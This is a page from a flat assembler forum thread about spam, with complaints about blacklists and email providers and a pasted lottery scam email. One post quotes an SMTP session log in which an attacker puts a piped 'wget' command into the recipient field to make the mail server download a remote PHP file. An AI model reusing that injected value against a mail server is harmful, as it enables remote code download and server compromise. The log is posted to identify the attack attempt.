flat assembler
Message board for the users of flat assembler.

Index > Heap > I hate spam

Goto page Previous  1, 2, 3, 4, 5  Next
Author
Thread Post new topic Reply to topic
Alphonso

Alphonso
bitRAKE wrote:
The best thing I think would be to compile a list of people responsible for spam
You mean like this Spamhaus

Not sure if it does any good. I also have my own annoyances with Spamhaus as they block dynamic IPs.

The spammer / bot infected computer just moves on to a new IP and leaves the old blacklisted IP for re-use by someone who's done nothing wrong but now can't send email's to servers that use Spamhaus. Mad
Post 15 May 2008, 07:21
revolution
When all else fails, read the source

revolution
Just now I had a quick look at the contents of my spam folder. Why does 90% of the spam now have Paris Hilton in the title? Are people really so gullible that they open these unwanted messages, and worse, actually buy the fake pills and potions touted within? I doubt the message content has any information about P.H. anyway (although I couldn't be bothered to view any to confirm this suspicion). The whole idea is just bizarre, who even cares about her anyway?
Post 23 Aug 2008, 17:52
View user's profile Send private message Visit poster's website Reply with quote
tom tobias

tom tobias
revolution, sharing his opinion of Paris Hilton, wrote:
...who even cares about her anyway?
Umm, at times like this, I remember Ms. Taken from the 2006 Miss World contest in Poland. Anyone else recall her visage? I am unclear whether or not she would be a candidate for most of the spam messages I receive, which tend to focus on hyperprostatism, and erectile dysfunction....

Rolling Eyes
Post 23 Aug 2008, 20:31
revolution

revolution
Old topic but worth reviving to report something:

April 15 was a spam free day for me. Amazing and almost unbelievable!

I have seem reports occasionally about people being imprisoned or fined for sending spam but I never really took them seriously, it all seemed just token measures to show "they" are doing something. BUT ... perhaps I was wrong, and thankfully so. My spam is now around 3-4 per day, 1/10th of the previous level 2 years ago.

Will it ever go to zero? That would be really nice to see but it probably won't ever completely disappear.

But what is the real reason for the decline? Is it the arrests that happen occasionally or something else? Perhaps people are upgrading their computers and in the process losing the malware they had?
Post 17 Apr 2010, 09:24
View user's profile Send private message Visit poster's website Reply with quote
MHajduk

MHajduk
revolution wrote:
But what is the real reason for the decline? Is it the arrests that happen occasionally or something else? Perhaps people are upgrading their computers and in the process losing the malware they had?
You are right, I've also observed decrease of the amount of spam delivered daily to my Gmail account. Most probably spam filters, based on an advance text analysis (heuristic methods or other AI applications), are just more efficient?
Post 17 Apr 2010, 09:42
revolution

revolution
MHajduk wrote:
You are right, I've also observed decrease of the amount of spam delivered daily to my Gmail account. Most probably spam filters, based on an advance text analysis (heuristic methods or other AI applications), are just more efficient?
Do you mean that some email providers will delete messages if they think it is spam? What if they get it wrong and delete an important message that is not really spam? Confused
Post 17 Apr 2010, 10:37
MHajduk

MHajduk
revolution wrote:
MHajduk wrote:
Do you mean that some email providers will delete messages if they think it is spam? What if they get it wrong and delete an important message that is not really spam? Confused
Yes, some e-mail providers such as Yahoo! Mail or Windows Live Hotmail block messages sent by some legal companies, because it's considered as spam. For that reason I always recommend Gmail - they are more liberal and allow users to decide what should be treated as spam and what not.
Post 17 Apr 2010, 11:01
ass0

ass0
Nah! gmail sucks balls 'cause in all America (North, Center, South) is needed to provide your phone number to get a new account (for SMS verification), even with invitation. Is the worse service ever!!

Post 17 Apr 2010, 12:19
vid
Verbosity in development

vid
Quote:
Nah! gmail sucks balls 'cause in all America (North, Center, South) is needed to provide your phone number to get a new account (for SMS verification), even with invitation. Is the worse service ever!!

Really? :O
Post 17 Apr 2010, 13:52
View user's profile Send private message Visit poster's website AIM Address MSN Messenger ICQ Number Reply with quote
ass0

ass0

Post 17 Apr 2010, 14:10
revolution

revolution
ass0 wrote:
Just use a proxy in another country. This is the Internet, anything is possible. Wink
Post 17 Apr 2010, 14:34
ass0

ass0
They know the proxies list and have them banned, the way to get a foreign ip is infecting someone.

Post 17 Apr 2010, 14:50
ManOfSteel

ManOfSteel
Roll your own mail server Rolling Eyes
Post 17 Apr 2010, 15:35
mindcooler

mindcooler
ManOfSteel wrote:
Roll your own mail server Rolling Eyes

I have received 2 spam mails since I did just that some half a year ago.

Post 17 Apr 2010, 18:54
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number Reply with quote
ManOfSteel

ManOfSteel
See?!
Post 17 Apr 2010, 20:26
mindcooler

mindcooler
Instead of spam, I get SMTP error notifications from people trying to send spam via my server. This is the most recent and the most curious. Any idea what he was trying to pull?

Code:
 Out: 220 xxxx.net ESMTP Postfix
 In:  HELO bluedick
 Out: 250 xxxx.net
 In:  mail from: blue@dick.com
 Out: 250 2.1.0 Ok
 In:  rcpt to: root+:"|wget http://fortunes.in/x1x.php"
 Out: 503 5.5.0 <blue@dick.com>: Sender address rejected: Improper use of SMTP
     command pipelining
 In:  data
 Out: 554 5.5.1 Error: no valid recipients
 In:  .
 Out: 502 5.5.2 Error: command not recognized
 In:  quit
 Out: 221 2.0.0 Bye    

Last edited by mindcooler on 17 Apr 2010, 21:10; edited 1 time in total
Post 17 Apr 2010, 20:55
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number Reply with quote
ass0

ass0
hahaha he was trying to inject you a php exploit. But is not more "light" to make ur own version of smtp in fasm? I guess u're using some kind of package of you linux distro, anyway i am not well versed in linux xD.

Post 17 Apr 2010, 21:03
edemko

edemko
a story of today
Code:
> Alliance Second Reminder!! 
> Dear Winner, 
> Alliance International Net Award officially notify you that your 
email 
> ID emerged winner of USD$1 Million in an E-mail program. 
> Ref: Number: LSLUK/2031/8161/09 BATCH Number: 14/011/IPD Lucky 
> Number:3-4-17-28-35-44 Ticket Number:50941465206-529 Serial 
> Number:5772-54 
> For more information Contact: 
> Dr.Micheal Philips 
> E-mail:eu_claimdept@aol.nl 
> Yours Sincerely 
> Mrs.Magaret Carocci. 

Hi, are you sure Smile 
Who are you at least?

Post 05 May 2010, 11:26
revolution

revolution
Isn't that awfully kind of them to just give away $1000000 to random people. It is nice to know that there are still some good people out there. I wonder if they will ask you to make some small payments to cover some expenses ... and taxes ... and stamp duty ... and legal fees ... and courier costs ... and bank fees ... and personal consultant charges ...? Never mind, I'm sure it is all above board and legit. Computers don't lie so it must be true!
Post 05 May 2010, 11:37
edemko

edemko
http://www.svbizlaw.com/ is the answer: they say many cases have been under their name.
It looks funny first of all like your profile web-site field's address, which had been visited twice by me.
Post 05 May 2010, 12:16

Jump to:  
Goto page Previous  1, 2, 3, 4, 5  Next

< Last Thread | Next Thread >
Forum Rules: